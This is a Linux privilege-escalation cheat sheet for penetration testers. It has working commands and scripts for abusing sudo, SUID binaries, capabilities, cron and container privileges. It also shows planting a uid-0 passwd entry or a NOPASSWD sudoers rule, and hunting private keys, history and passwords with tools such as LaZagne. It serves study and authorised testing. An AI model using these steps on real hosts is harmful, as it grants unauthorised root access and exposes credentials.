# Linux

## Enumeration

<table><thead><tr><th width="172">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/peass-ng/PEASS-ng/tree/master/linPEAS">LinPEAS</a></td><td><a href="https://github.com/peass-ng/PEASS-ng/releases">DOWNLOAD</a>.<br>In <a href="https://github.com/peass-ng/PEASS-ng/tree/master/metasploit">Metasploit</a>.</td></tr><tr><td><a href="https://github.com/rebootuser/LinEnum">LinEnum</a></td><td><code>./LinEnum.sh -t -e &#x3C;EXPORT_DIR> -r &#x3C;REPORT_NAME></code><br><code>-t</code> runs the thorough checks, <code>-e</code> is the directory the report is written to.</td></tr><tr><td><a href="https://github.com/CISOfy/lynis">Lynis</a></td><td>Security auditing tool for Linux, macOS and UNIX-based systems. Tests the host's security defenses.<br><code>./lynis audit system</code></td></tr></tbody></table>

## Functionality

[GTFOBins](https://gtfobins.github.io/) shows how to abuse SUID bits, capabilities and sudo rules on known programs to get a shell, read or write files, or escalate privileges.

{% embed url="https://gtfobins.github.io/" %}

### SUDO

The sudo utility (superuser do) runs a command as another user, usually root, according to the rules in `/etc/sudoers` and `/etc/sudoers.d/`.\
Membership in the `sudo` (or `wheel`) group is only the common default rule; any user or group can be granted rights there.

{% code overflow="wrap" %}

```bash
sudo -V   # check the version against known sudo vulnerabilities (see the CVE section)
```

{% endcode %}

{% code overflow="wrap" %}

```bash
sudo -l
```

{% endcode %}

Look for `NOPASSWD` entries and for permitted commands that can spawn a shell or write files (check each on GTFOBins).\
Also remember **abuse of relative paths** (a permitted script or binary that calls another program without an absolute path while `secure_path` is not set, so the caller's `PATH` is used) and **wildcards** (a `*` in the permitted command that the shell expands in a directory you control).

{% code overflow="wrap" %}

```bash
# once a sudo rule lets you run a command as root, make bash SUID-root...
chmod u+s /bin/bash
# ...and start it with -p so bash keeps the effective uid 0 instead of dropping it
/bin/bash -p
```

{% endcode %}
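The checks above, as an added example script that is not part of this page: it parses `sudo -l` output and flags `NOPASSWD` rules, wildcards, `ALL` commands, targets the current user can edit, and a missing `secure_path`. The `sudo -l` text, the user `alice` and the backup script are constructed for the demo (the script is created in a temporary directory so the "writable" check has something real to test).

```bash
#!/bin/sh
# Added example, not from the original page: triage the output of `sudo -l`.
# The sample output and $BACKUP_SCRIPT are constructed for this demo.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
BACKUP_SCRIPT=$WORK/backup.sh
# a script that a sudo rule permits and that we happen to be able to edit
printf '#!/bin/sh\ncd /var/www && tar czf /srv/backup.tgz *\n' >"$BACKUP_SCRIPT"
chmod 755 "$BACKUP_SCRIPT"

SAMPLE_SUDO_L="Matching Defaults entries for alice on target:
    env_reset, mail_badpass

User alice may run the following commands on target:
    (root) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart apache2
    (ALL : ALL) NOPASSWD: $BACKUP_SCRIPT *
    (root) NOPASSWD: /usr/bin/tar -czf /tmp/backup.tgz /var/www"

# Reads `sudo -l` text on stdin and prints one "<command>: <flags>" line per
# rule. Flags: nopasswd (no password prompt), wildcard (the shell expands *
# inside the permitted argument list), all (ALL as the command), writable (we
# can edit the target, so we decide what runs as root). A final "PATH:" line
# warns when Defaults has no secure_path: programs called by relative path
# from a permitted script then resolve through the calling user's PATH.
sudo_triage() {
  secure_path=0
  while IFS= read -r line; do
    case $line in *secure_path=*) secure_path=1 ;; esac
    case $line in *"("*")"*) ;; *) continue ;; esac   # only "(runas) command" lines
    entry=${line#*") "}                                 # drop the "(root) " prefix
    flags=""
    case $entry in NOPASSWD:*) flags="nopasswd"; entry=${entry#NOPASSWD: } ;; esac
    cmd=${entry%% *}
    case $entry in *\**) flags="$flags wildcard" ;; esac
    case $cmd in ALL) flags="$flags all" ;; esac
    [ -w "$cmd" ] && flags="$flags writable"
    flags=${flags# }
    printf '%s: %s\n' "$cmd" "${flags:-none}"
  done
  if [ "$secure_path" -eq 0 ]; then
    printf 'PATH: no secure_path in Defaults, relative-path calls use the caller PATH\n'
  fi
}

# on a target: sudo -l | sudo_triage
printf '%s\n' "$SAMPLE_SUDO_L" | sudo_triage
```

Every flagged command still needs a GTFOBins lookup; the script only tells you where to look first. Run it as the low-privileged user, because the `writable` check reflects that user's permissions.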

### SUID Program

Programs with the SUID flag run with the privileges of the file's owner (typically root) instead of those of the user who executes them.\
Analyze these programs: check each against GTFOBins and look closely at anything that is not part of the distribution's default set.

{% code overflow="wrap" %}

```bash
find / -perm -u=s -type f 2>/dev/null
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# SUID bit set (-4000) and owned by root; ls -ldb shows owner, mode and any symlink target
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null
```

{% endcode %}

### SGID Program

Programs with the SGID flag run with the privileges of the file's group instead of the caller's group (for example the `shadow` group, which can read `/etc/shadow`).\
Analyze these programs.

{% code overflow="wrap" %}

```bash
find / -perm -g=s -type f 2>/dev/null
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# -perm -6000 matches only files with BOTH SUID and SGID set; use -perm /6000 (GNU find) for either bit
find / -user root -perm -6000 -exec ls -ldb {} \; 2>/dev/null
```

{% endcode %}

### Capabilities

Capabilities split root's privileges into units that can be granted to a binary (file capabilities), a process or a service, for example `cap_setuid` or `cap_dac_read_search`.\
Look for binaries carrying capabilities that let them change uid, read or write arbitrary files, or ptrace other processes.

{% code overflow="wrap" %}

```bash
/usr/sbin/getcap -r / 2>/dev/null
```

{% endcode %}

{% code overflow="wrap" %}

```bash
find /usr/bin /usr/sbin /usr/local/bin /usr/local/sbin -type f -exec getcap {} \;
```

{% endcode %}
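The three sections above (SUID, SGID and capabilities) produce lists that are long on a real host, so here is an added example, not part of this page, that triages them: it marks setuid/setgid files that are not in a baseline of binaries a typical distribution ships, and marks file capabilities that are root-equivalent on their own. The `KNOWN_SETID` baseline and the `DANGEROUS_CAPS` list are assumptions to adapt to the target, and the sample input at the bottom is constructed.

```bash
#!/bin/sh
# Added example, not from the original page: triage find/getcap output.
# KNOWN_SETID is an assumed Debian/Ubuntu-style baseline; adjust per target.

KNOWN_SETID="/usr/bin/passwd /usr/bin/su /usr/bin/sudo /usr/bin/mount /usr/bin/umount
/usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/newgrp /usr/bin/pkexec
/usr/bin/fusermount /usr/bin/fusermount3 /usr/bin/wall /usr/bin/write /usr/bin/chage
/usr/bin/expiry /usr/bin/crontab /usr/bin/ssh-agent /usr/sbin/unix_chkpwd
/usr/lib/openssh/ssh-keysign /usr/lib/dbus-1.0/dbus-daemon-launch-helper"

# Capabilities that are root-equivalent by themselves (change uid, bypass
# file permissions, ptrace root processes, load modules, raw disk access).
DANGEROUS_CAPS="cap_setuid cap_setgid cap_dac_override cap_dac_read_search cap_chown cap_fowner cap_setfcap cap_sys_admin cap_sys_ptrace cap_sys_module cap_sys_rawio"

# stdin: "MODE OWNER GROUP PATH" lines, as printed by
#   find / -perm /6000 -type f -printf '%m %u %g %p\n' 2>/dev/null
# stdout: "suid|sgid|suid+sgid OWNER:GROUP PATH [unusual]"
setid_triage() {
  known=" $(printf '%s' "$KNOWN_SETID" | tr '\n' ' ') "
  while read -r mode owner group path; do
    [ -n "$path" ] || continue
    kind=""
    [ $((0$mode & 04000)) -ne 0 ] && kind="suid"          # octal test of the setuid bit
    [ $((0$mode & 02000)) -ne 0 ] && kind="${kind:+$kind+}sgid"
    [ -n "$kind" ] || continue
    tag=""
    case $known in *" $path "*) ;; *) tag=" unusual" ;; esac
    printf '%s %s:%s %s%s\n' "$kind" "$owner" "$group" "$path" "$tag"
  done
}

# stdin: getcap -r output in either libcap format:
#   /usr/bin/python3 cap_setuid=ep        (libcap 2.41+)
#   /usr/bin/python3 = cap_setuid+ep      (older libcap)
# stdout: "PATH cap_a,cap_b [dangerous]"
cap_triage() {
  while IFS= read -r line; do
    [ -n "$line" ] || continue
    path=${line%% *}
    caps=${line#"$path"}
    caps=${caps#" ="}                  # old-style separator
    caps=${caps# }
    # strip the flag suffixes (=ep, +eip, -e) and split the names
    names=$(printf '%s' "$caps" | sed 's/[=+-][eip]*//g; s/,/ /g')
    tag=""
    for n in $names; do
      case " $DANGEROUS_CAPS " in *" $n "*) tag=" dangerous" ;; esac
    done
    printf '%s %s%s\n' "$path" "$(echo $names | tr ' ' ,)" "$tag"
  done
}

# Constructed samples; on a target, pipe the real find/getcap output instead.
printf '%s\n' \
  "4755 root root /usr/bin/passwd" \
  "4755 root root /usr/local/bin/backup" \
  "755 root root /usr/bin/ls" \
  "2755 root shadow /usr/bin/chage" \
  "6755 root staff /opt/tool" | setid_triage
printf '%s\n' \
  "/usr/bin/ping cap_net_raw=ep" \
  "/usr/bin/python3 = cap_setuid+ep" \
  "/usr/local/bin/backup cap_dac_read_search=ep" | cap_triage
```

A binary that is in the baseline can still be exploitable (an old `pkexec` or `sudo` is the classic case), so the baseline only orders the work; the "unusual" and "dangerous" entries go to GTFOBins first, the rest to a version check.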

### Groups

If the user belongs to certain privileged groups, they can perform privileged and potentially harmful actions (mount or read raw disks, read logs, control containers).

{% code overflow="wrap" %}

```bash
id # see groups
```

{% endcode %}

* [Docker](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#docker)
* [LXD / LXC](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#lxd-lxc)
* [disk](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#disk)
* [adm](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-groups.md#adm)

### Programs

Check the versions of installed programs and services for known privilege escalation exploits.\
See the [CVE](/rednote/pentesting-process/cve/linux.md) section.

## Process

Look at what is running, as whom, and with which arguments.

```bash
# poll the process list for credentials passed on the command line
watch -n 1 "ps aux | grep -i pass | grep -v grep"
```

### Cron Jobs

Look through the cron jobs for scripts or binaries that you can edit, or that live in directories you can write to.

{% code overflow="wrap" %}

```bash
ls -lah /etc/cron* && cat /etc/crontab
ls -la /var/spool/cron/crontabs 2>/dev/null   # per-user crontabs, normally root-only
```

{% endcode %}

{% code overflow="wrap" %}

```bash
crontab -l
```

{% endcode %}

{% code overflow="wrap" %}

```bash
grep "CRON" /var/log/syslog   # which jobs actually ran, and as which user
cat /var/log/cron.log
```

{% endcode %}

Also remember abuse via wildcards: the classic case is `tar` run on `*` from a directory you can write to, where file names are parsed as options.
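The cron checks above, as an added example script that is not part of this page: it reads a crontab (system format with a user field, or `crontab -l` format) and reports jobs whose program the current user can edit or replace, jobs that call a program by relative path (resolved through the crontab's `PATH`), jobs with a wildcard argument, and `PATH` directories that are writable. The crontab text, the script and the directory are constructed in a temporary directory for the demo.

```bash
#!/bin/sh
# Added example, not from the original page: triage crontab entries.
# SAMPLE_CRONTAB, backup.sh and the bin directory are constructed for the demo.

WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
mkdir "$WORK/bin"
printf '#!/bin/sh\necho backup\n' >"$WORK/backup.sh"
chmod 755 "$WORK/backup.sh"

# system-crontab format (schedule, user, command), as in /etc/crontab
SAMPLE_CRONTAB="# m h dom mon dow user command
PATH=/usr/local/bin:/usr/bin:/bin:$WORK/bin
MAILTO=root
*/5 * * * * root $WORK/backup.sh
0 3 * * * root cd /var/www && /usr/bin/tar czf /srv/www.tgz *
@daily root cleanup-tmp"

# Usage: cron_triage [system] < crontab-text
#   system: lines carry a user field (/etc/crontab, /etc/cron.d/*);
#   omit it for `crontab -l` output.
# Prints "[user] command: flags" per job and "PATH dir D: writable" for every
# directory in the crontab's PATH= that the current user can write to.
# Flags: writable (we can edit the program), dir-writable (we can replace it),
# relative (no absolute path, resolved through cron's PATH), wildcard.
cron_triage() (
  set -f                                   # keep * literal while splitting
  fmt=${1:-user}
  me=$(id -un)
  cron_path=""
  while IFS= read -r line; do
    case $line in ''|'#'*) continue ;; esac
    case $line in
      *[[:space:]]*) ;;                    # a job line
      PATH=*) cron_path=${line#PATH=}; continue ;;
      *=*) continue ;;                     # other variable assignment
    esac
    set -- $line
    case $1 in @*) n=1 ;; *) n=5 ;; esac   # @daily-style or five time fields
    [ $# -gt "$n" ] || continue
    shift "$n"
    if [ "$fmt" = system ]; then user=$1; shift; else user=$me; fi
    [ $# -gt 0 ] || continue
    cmd=$*
    # "cd DIR && real-command" is common in crontabs; judge the real command
    while [ "$1" = cd ] && [ $# -gt 3 ] && [ "$3" = "&&" ]; do shift 3; done
    prog=$1
    flags=""
    case $prog in
      /*) [ -w "$prog" ] && flags="$flags writable"
          [ -w "$(dirname "$prog")" ] && flags="$flags dir-writable" ;;
      *)  flags="$flags relative" ;;
    esac
    case $cmd in *\**) flags="$flags wildcard" ;; esac
    flags=${flags# }
    printf '[%s] %s: %s\n' "$user" "$cmd" "${flags:-none}"
  done
  if [ -n "$cron_path" ]; then
    IFS=:
    for d in $cron_path; do
      if [ -w "$d" ]; then printf 'PATH dir %s: writable\n' "$d"; fi
    done
  fi
  true
)

# on a target: cron_triage system < /etc/crontab ; crontab -l | cron_triage
printf '%s\n' "$SAMPLE_CRONTAB" | cron_triage system
```

The wildcard flag is only a lead: the `tar` trick needs the `*` expanded in a directory you can create files in, which is why the `cd` prefix is kept in the printed command. Run the script as the low-privileged user, and pair it with pspy to confirm the job really fires.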

### [pspy](https://github.com/DominicBreuker/pspy)

Command-line tool designed to snoop around linux processes without needing root permissions. It allows you to see commands executed by other users, cron jobs, etc. while they are running.

{% code overflow="wrap" %}

```bash
./pspy32
./pspy32s # smaller (compressed) build of the same binary
```

{% endcode %}

{% code overflow="wrap" %}

```bash
./pspy64
./pspy64s # smaller (compressed) build of the same binary
```

{% endcode %}

## File

### Documents

Search for sensitive information in different files, such as system password files, files in the home profile, text files saved on Desktop/Documents, temporary files, etc.

{% code overflow="wrap" %}

```bash
# check which of these are readable (password hashes, old passwords) and which are writable
ls -l /etc/passwd /etc/shadow /etc/security/opasswd /etc/sudoers
```

{% endcode %}

**Note**:\
If `/etc/passwd` is writable, replace the `x` in the password field (or append a new uid 0 user) with the output of `openssl passwd -6 <PASS>`; a hash placed there is used directly, without consulting `/etc/shadow`. If `/etc/shadow` is writable, overwrite the existing hash field the same way. Use `-6` (SHA-512) explicitly, because the default algorithm of `openssl passwd` depends on the OpenSSL version.\
If `/etc/sudoers` is writable, add `<USER> ALL=(ALL:ALL) ALL` or `<USER> ALL=(ALL) NOPASSWD: ALL`; a syntax error there disables `sudo` for everyone, so validate the edited file with `visudo -cf <FILE>` first.
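The two edits described in the note, as an added example that is not part of this page: it builds the `/etc/passwd` line and the sudoers rule, and checks both on temporary copies before anything on the host is touched. It assumes OpenSSL 1.1.1 or later (for `passwd -6`); the user name `pwned` and the password are placeholders.

```bash
#!/bin/sh
# Added example, not from the original page: build and verify the passwd and
# sudoers entries from the note. Assumes openssl >= 1.1.1; works on copies.

# passwd(5) line for a new uid 0 user. A hash in the second field of
# /etc/passwd is used directly, so /etc/shadow is never consulted for it.
# -6 is given explicitly: the default of `openssl passwd` varies by version,
# and the old DES crypt silently truncates the password to 8 characters.
root_passwd_line() {   # usage: root_passwd_line NAME PASSWORD [SALT]
  salt=${3:-$(openssl rand -hex 6)}
  hash=$(openssl passwd -6 -salt "$salt" "$2") || return 1
  printf '%s:%s:0:0:%s:/root:/bin/sh\n' "$1" "$hash" "$1"
}

# uid of NAME in passwd-format FILE (empty if absent)
uid_of() {   # usage: uid_of NAME FILE
  awk -F: -v u="$1" '$1 == u { print $3 }' "$2"
}

# sudoers(5) rule: passwordless root for NAME
sudoers_rule() {   # usage: sudoers_rule NAME
  printf '%s ALL=(ALL:ALL) NOPASSWD: ALL\n' "$1"
}

# A syntax error in /etc/sudoers disables sudo for everyone, so parse the
# edited copy first. Returns visudo's status (it also warns when the file is
# not root-owned mode 0440, which a temporary copy will not be).
check_sudoers() {   # usage: check_sudoers FILE
  visudo -cf "$1"
}

# Demo on copies, never on the live files.
WORK=$(mktemp -d)
trap 'rm -rf "$WORK"' EXIT
cp /etc/passwd "$WORK/passwd" 2>/dev/null || printf 'root:x:0:0:root:/root:/bin/sh\n' >"$WORK/passwd"
if command -v openssl >/dev/null 2>&1; then
  root_passwd_line pwned 'Secret123!' >>"$WORK/passwd"
  echo "pwned has uid $(uid_of pwned "$WORK/passwd") in the copy"
fi
sudoers_rule pwned >"$WORK/sudoers"
if command -v visudo >/dev/null 2>&1; then
  check_sudoers "$WORK/sudoers" && echo "sudoers rule parses"
fi
if [ -w /etc/passwd ]; then echo "/etc/passwd is writable: append the line, then su pwned"; fi
if [ -w /etc/sudoers ]; then echo "/etc/sudoers is writable: append the rule after visudo -cf"; fi
```

Appending a new line is safer than editing root's own entry: it leaves the original account untouched for the blue team's sake and for your own (a broken root line on a host without another admin path is not recoverable remotely).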

{% code overflow="wrap" %}

```bash
cat ~/.bashrc          # aliases and exported variables sometimes embed credentials
cat ~/.bash_profile
```

{% endcode %}

{% code overflow="wrap" %}

```bash
ls /tmp
ls /var/tmp
ls /dev/shm
```

{% endcode %}

### SSH keys

Look for SSH keys; they may also be located outside the usual `~/.ssh` directory.

{% code overflow="wrap" %}

```bash
ls ~/.ssh
# check known_hosts to find out key targets
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# private keys start with "-----BEGIN ... PRIVATE KEY-----" on line 1, hence the ":1:" filter on grep's file:line: prefix
grep -rnw "PRIVATE KEY" /* 2>/dev/null | grep ":1:"
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# public keys and authorized_keys entries: which accounts and hosts trust a given key
grep -rnw "ssh-rsa" /* 2>/dev/null | grep ":1:"
```

{% endcode %}

### Config

Search for sensitive information in configuration files.

{% code overflow="wrap" %}

```bash
for l in .conf .config .cnf; do echo -e "\n--> $l"; find / -name "*$l" 2>/dev/null | grep -v "lib\|fonts\|share\|core"; done
```

{% endcode %}

{% code overflow="wrap" %}

```bash
find / ! -path "*/proc/*" -iname "*config*" -type f 2>/dev/null | grep -v "lib\|fonts\|share\|core"
```

{% endcode %}

### Backup

Check if there are any backup files that may contain sensitive information.

{% code overflow="wrap" %}

```bash
find / -name '*.bak' 2>/dev/null   # also try *.old, *~ and *.orig
```

{% endcode %}

### Script

Also check the bash scripts.

{% code overflow="wrap" %}

```bash
find / -name "*.sh" 2>/dev/null | grep -v "doc\|lib\|headers\|share\|src\|snap"
```

{% endcode %}

### Writable Files and Directories

Check if there are any interesting writable files and folders.

{% code overflow="wrap" %}

```bash
# world-writable files; swap -type f for -type d to list directories
find / -path /proc -prune -o -type f -perm -o+w -print 2>/dev/null
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# writable by the current user (owner, group or ACL, not only o+w); use -type d for directories
find / -writable -type f 2>/dev/null
```

{% endcode %}

### Hidden Files and Directories

Check if there are any interesting hidden files and folders with sensitive information.

{% code overflow="wrap" %}

```bash
find / -type f -name ".*" -exec ls -l {} \; 2>/dev/null | grep <USER>
```

{% endcode %}

{% code overflow="wrap" %}

```bash
find / -type d -name ".*" -ls 2>/dev/null
```

{% endcode %}

## Password

<table><thead><tr><th width="196">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/AlessandroZ/LaZagne">LaZagne</a></td><td>It searches for passwords.<br><code>laZagne.py all</code></td></tr><tr><td><a href="https://github.com/huntergregal/mimipenguin">mimipenguin</a></td><td>A tool to download the current Linux user's login password.</td></tr></tbody></table>

### Browser

<table><thead><tr><th width="196">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/moonD4rk/HackBrowserData">HackBrowserData</a></td><td>Extract sensitive data, including passwords, from browsers.<br><code>./hack-browser-data[.exe]</code> <em>(check the <code>results</code> directory)</em></td></tr></tbody></table>

## Various

### History

Search the command history.

{% code overflow="wrap" %}

```bash
cat ~/.*history
```

{% endcode %}

{% code overflow="wrap" %}

```bash
history
```

{% endcode %}

{% code overflow="wrap" %}

```bash
find / -type f \( -name "*_hist" -o -name "*_history" \) -exec ls -l {} \; 2>/dev/null
```

{% endcode %}

### Variables

Check environment variables for sensitive information such as passwords or misconfiguration.

{% code overflow="wrap" %}

```bash
env
```

{% endcode %}

{% code overflow="wrap" %}

```bash
echo $PATH
```

{% endcode %}

### Library

For ELFs see if you can manipulate the LD\_PRELOAD variable or the RUNPATH setting of the binaries. In Python see if you can manipulate the PYTHONPATH variable or if there are writable directories in the module import.

* [LD\_PRELOAD](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#ld_preload)
* [RUNPATH](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#runpath)
* [PYTHONPATH](/rednote/pentesting-process/privilege-escalation/linux/linux-privilege-escalation-with-library.md#pythonpath)

### Passive Traffic

```bash
# useful when sudo -l allows tcpdump; -i lo catches local services, -i any catches every interface
sudo tcpdump -i lo -A | grep "pass"
```

<table><thead><tr><th width="137">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/lgandx/PCredz">PCredz</a></td><td>Capture sensitive information from live network traffic, with tcpdump</td></tr></tbody></table>

### Restricted Shells

Certain users may be assigned shells with limited functionality, such as rbash, rksh or rzsh.

Check executable commands and look for them in [GTFOBins](https://gtfobins.github.io/)

{% code overflow="wrap" %}

```bash
compgen -c
```

{% endcode %}

Also try

* Command injection with `` ` ``
* Command Chaining with `;` `&` `|`
* Variable changes: list the exported variables with `export -p` and check whether `PATH` or `SHELL` can be modified
* Shell functions

After the escape, you may need to update the path variable.

{% code overflow="wrap" %}

```bash
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

{% endcode %}

### Container

Check whether you are inside a container.

{% code overflow="wrap" %}

```bash
cat /proc/mounts
# an overlay root, docker/containerd paths, or host volumes mounted read-write are the tells
ls -la /.dockerenv 2>/dev/null
```

{% endcode %}

Containers can run privileged or unprivileged; the capability sets of PID 1 show which.

{% code overflow="wrap" %}

```bash
grep Cap /proc/1/status
# CapPrm, CapEff and CapBnd: a full mask (0000003fffffffff or 000001ffffffffff, depending on the kernel) means a privileged container
```

{% endcode %}

Decode with capsh

{% code overflow="wrap" %}

```bash
capsh --decode=<VALUE>
```

{% endcode %}

In order to exploit these capabilities, we first have to escalate to root inside the container and then use them in a privileged-container escape.
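The capability check above, as an added example script that is not part of this page: it decodes a `CapEff`/`CapBnd` hex mask into capability names without depending on `capsh`, reads the mask of PID 1 when `/proc/1/status` is readable, and prints the usual container indicators. The numbering follows the kernel's `capability.h` (bit 0 = `cap_chown`); the fallback mask `00000000a80425fb` is Docker's default set and is used only when PID 1 cannot be read.

```bash
#!/bin/sh
# Added example, not from the original page: decode capability masks from
# /proc/<pid>/status and list container hints. CAP_NAMES follows the kernel
# numbering in include/uapi/linux/capability.h (bit 0 = cap_chown).

CAP_NAMES="chown dac_override dac_read_search fowner fsetid kill setgid setuid
setpcap linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock
ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin sys_boot
sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write audit_control
setfcap mac_override mac_admin syslog wake_alarm block_suspend audit_read perfmon
bpf checkpoint_restore"

# decode_caps HEXMASK -> comma-separated cap_* names for the set bits
decode_caps() {
  v=$((0x$1))
  i=0
  out=""
  for name in $CAP_NAMES; do
    if [ $(( (v >> i) & 1 )) -eq 1 ]; then
      out="$out${out:+,}cap_$name"
    fi
    i=$((i + 1))
  done
  printf '%s\n' "$out"
}

# has_cap HEXMASK NAME (without the cap_ prefix) -> exit 0 if the bit is set
has_cap() {
  decode_caps "$1" | tr ',' '\n' | grep -qx "cap_$2"
}

# cap_field PID FIELD -> the hex mask of CapEff/CapPrm/CapBnd/CapInh for PID
cap_field() {
  awk -v f="$2:" '$1 == f { print $2 }' "/proc/$1/status"
}

# Signs that we are in a container; each is a hint, none is proof.
container_hints() {
  [ -f /.dockerenv ] && echo "/.dockerenv exists"
  grep -qs 'overlay / ' /proc/mounts && echo "root filesystem is overlayfs"
  grep -qsE 'docker|lxc|kubepods|containerd' /proc/1/cgroup && echo "container cgroup on PID 1"
  return 0
}

# Demo: decode PID 1's effective set when readable, else a constructed mask
# (00000000a80425fb is Docker's default set: 14 capabilities, no sys_admin).
container_hints
mask=$(cap_field 1 CapEff 2>/dev/null || true)
mask=${mask:-00000000a80425fb}
echo "CapEff $mask: $(decode_caps "$mask")"
if has_cap "$mask" sys_admin; then
  echo "cap_sys_admin present: likely --privileged or similar, mount-based escapes are in reach"
else
  echo "no cap_sys_admin: an escape needs a kernel bug, a host mount or another misconfiguration"
fi
```

`CapEff` of PID 1 tells you what the container can do right now; `CapBnd` tells you the ceiling any process inside it can ever reach, which is what matters once you are root in the container.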

## Kernel

Exploit at kernel level.\
Depends on the kernel version and the distribution.\
Better to compile the exploit on the target if it has gcc, so it is built against the target's libc and headers.\
**May crash the system!**

<table><thead><tr><th width="151">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/The-Z-Labs/linux-exploit-suggester">Linux-Exploit-Suggester</a></td><td>It allows you to detect kernel-level security weaknesses.</td></tr></tbody></table>

See [Linux-CVE](/rednote/pentesting-process/cve/linux.md) section.

